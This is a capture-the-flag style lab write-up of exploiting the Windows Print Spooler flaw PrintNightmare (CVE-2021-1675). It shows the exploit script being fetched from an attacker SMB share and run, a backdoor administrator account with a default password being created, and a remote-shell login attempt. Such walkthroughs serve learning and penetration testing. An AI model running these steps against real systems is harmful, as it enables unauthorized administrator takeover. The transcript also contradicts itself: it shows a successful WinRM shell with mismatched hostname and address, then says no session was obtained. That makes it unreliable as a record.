CVE-2021-1675
a vulnerability classified as critical was found in microsoft windows (Operating System). Affected by this vulnerability is an unknown part of the component Print Spooler. As an impact it is known to affect confidentiality, integrity, and availability.
Low privileged users are able to add a printer, and specifically providing a malicious driver for that printer, in which case, results in escalation of privileges, gaining the system level access
Overview of CVE-2021-1675/CVE-2021-34527
Testing
The vulnerability takes advantage of the Windows-native service called Print Spooler that is enabled by default on all Windows machines (servers and endpoints)
The target system running a spoolsv process gave away, and it didn’t seem like there was a patch installed for that.
On top of it, I knew that there is the spooler service running from the MSRPC enumeration way back. Too bad that it wasn’t under a named piped. I would have been able to exploit this remotely if it was the case.
PS C:\tmp> Get-Service Spooler
Status Name DisplayName
------ ---- -----------
Running Spooler Print SpoolerExploit (Invoke-Nightmare.ps1)
i found the exploit online
it’s a powershell implementation of the original printnightmare exploit
Exploitation
PS C:\tmp> copy \\10.10.14.5\smb\Invoke-Nightmare.ps1 .I transferred the PowerShell script to the target system over SMB
PS C:\tmp> . .\Invoke-Nightmare.ps1
PS C:\tmp> Invoke-NightmareI proceeded to import the exploit script and executed the exploit cmdlet
Successful exploitation should create an administrator user by default
PS C:\tmp> net user
User accounts for \\
-------------------------------------------------------------------------------
adm1n Administrator DefaultAccount
Guest WDAGUtilityAccount
The command completed with one or more errors.There is the adm1n user that the exploit generated.
PS C:\tmp> net user adm1n
User name adm1n
Full Name adm1n
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/1/2023 12:55:16 PM
Password expires Never
Password changeable 2/1/2023 12:55:16 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.The newly created user is indeed part of the Administrators group
The credential, by default, is adm1n:P@ssw0rd
┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ evil-winrm -i $IP -u 'adm1n' -p 'P@ssw0rd'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adm1n\Documents> whoami
return\adm1n
*Evil-WinRM* PS C:\Users\adm1n\Documents> hostname
remote
*Evil-WinRM* PS C:\Users\adm1n\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::ba
IPv6 Address. . . . . . . . . . . : dead:beef::25dd:3404:8d18:2459
Link-local IPv6 Address . . . . . : fe80::25dd:3404:8d18:2459%12
IPv4 Address. . . . . . . . . . . : 10.10.10.180
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%12
10.10.10.2System Level Compromise
For some reason, I was unable to Win-RM to the target system with the newly created user
I never really gain a session as the adm1n user as the target system is configured in a manner where PSRemote is completely disabled.
The same goes for the SMB server. I was unable to use impacket-psexec as the SMB server would just deny me although I am the administrator
However, the exploit is a success as it created an administrator user that I know the credential of